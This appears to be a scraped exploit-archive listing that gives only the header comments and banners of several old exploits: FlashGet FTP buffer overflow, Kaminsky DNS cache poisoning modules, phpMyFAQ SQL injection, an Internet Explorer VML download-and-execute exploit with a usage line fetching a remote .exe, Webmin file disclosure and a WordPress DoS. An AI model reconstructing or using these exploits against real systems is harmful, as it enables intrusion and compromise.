Remote Exploit

FlashGet 1.9 Buffer Overflow PoC Exploit

#!/usr/bin/python
# FlashGet 1.9 (FTP PWD Response) 0day Remote Buffer Overflow PoC Exploit
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Testen on: FlashGet 1.9 / XP SP2 Polish
# Product URL:
#">http://www.flashget.com/en/download.htm?uid=undefined
#
Details:..

Kaminsky DNS Cache Poisoning Flaw Exploit for Domains

                      ____      ____     __    __
                     /    \    /    \   |  |  |  |
        ----====####/  /\__\##/  /\  \##|  |##|  |####====----
                   |  |      |  |__|  | |  |  |  |
                   |  |  ___ |   __   | |  |  |  |
  ------======######\  \/  /#|  |##|  |#|  |##|  |######======------
                     \____/  |__|  |__|  \______/
                                                    
                    Computer Academic Underground
                       
">http://www.caughq.org
                            Exploit Code

===============/========================================================
Exploit ID:     CAU-EX-2008-0003
Release Date:   2008.07.23
Title:          bailiwicked_domain.rb
Description:    Kaminsky DNS Cache Poisoning Flaw Exploit for Domains
Tested:         BIND 9.4.1-9.4.2
Attributes:     Remote, Poison, Resolver, Metasploit
Exploit URL:   
Author/Email:">http://www.caughq.org/exploits/CAU-EX-2008-0003.txt
Author/Email:
   I)ruid <druid (@) caughq.org>
                H D Moore <hdm (@) metasploit.com>
===============/========================================================

Kaminsky DNS Cache Poisoning Flaw Exploit For Hosts

                      ____      ____     __    __
                     /    \    /    \   |  |  |  |
        ----====####/  /\__\##/  /\  \##|  |##|  |####====----
                   |  |      |  |__|  | |  |  |  |
                   |  |  ___ |   __   | |  |  |  |
  ------======######\  \/  /#|  |##|  |#|  |##|  |######======------
                     \____/  |__|  |__|  \______/
                                                    
                    Computer Academic Underground
                       
">http://www.caughq.org
                            Exploit Code

===============/========================================================
Exploit ID:     CAU-EX-2008-0002
Release Date:   2008.07.23
Title:          bailiwicked_host.rb
Description:    Kaminsky DNS Cache Poisoning Flaw Exploit
Tested:         BIND 9.4.1-9.4.2
Attributes:     Remote, Poison, Resolver, Metasploit
Exploit URL:   
Author/Email:">http://www.caughq.org/exploits/CAU-EX-2008-0002.txt
Author/Email:
   I)ruid <druid (@) caughq.org>
                H D Moore <hdm (@) metasploit.com>
===============/========================================================

phpMyFAQ 1.6.7 Remote SQL Injection

#!/usr/bin/php5-cgi -q
<?

/*
Sql injection / remote command execution exploit for phpmyfaq < 1.6.8

Bugtraq:
http://www.securityfocus.com/bid/21944

CVS:
http://thinkforge.org/plugins/scmcvs/cvsweb.php/phpmyfaq/admin/attachment.php.diff?r1=1.7.2.11.2.5;r2=1.7.2.11.2.6;cvsroot=phpmyfaq;f=h

Internet Explorer VML Buffer Overflow Download Exec Exploit

/*
*-----------------------------------------------------------------------
*
* vml.c - Internet Explorer VML Buffer Overflow Download Exec Exploit
* !!! 0day !!! Public Version !!!
*
* Copyright (C) 2006 XSec All Rights Reserved.
*
* Author : nop
* : nop#xsec.org
* :
*">http://www.xsec.org
*
:
* Tested : Windows 2000 Server CN
* : + Internet Explorer 6.0 SP1
* :
* Complie : cl vml.c
* :
* Usage : d:\>vml
* :
* : Usage: vml <URL> [htmlfile]
* :
* : d:\>vml http://xsec.org/xxx.exe xxx.htm
* :
*
*------------------------------------------------------------------------
*/

Webmin Unspecifed Information Disclosure Exploit

#!/usr/bin/perl
#  Exploit for WEBMIN and USERMIN  less than 1.29x           ARBITARY REMOTE FILE DISCLOSURE
#  Thrusday 13th  July 2006
#  Vulnerability Disclosure at securitydot.net
#  Coded by UmZ! umz32.dll@gmail.com

#
#
#  Make sure you have LWP before using this exploit.
#  USE IT AT YOUR OWN RISK
#
#  GREETS to wiseguy, Anonymous Individual, Uquali......Jhant... Fakhru... etc........................
#  for other.. like AHMED n FAIZ ... (GET A LIFE MAN).

WordPress 2.0.1 Remote DoS Exploit

#!perl
#Greets to all omega-team members + h4cky0u[h4cky0u.org], lessMX6 and all dudes from #DevilDev ;)
#The exploit was tested on 10 machines but not all got flooded.Only 6/10 got crashed

İçeriği paylaş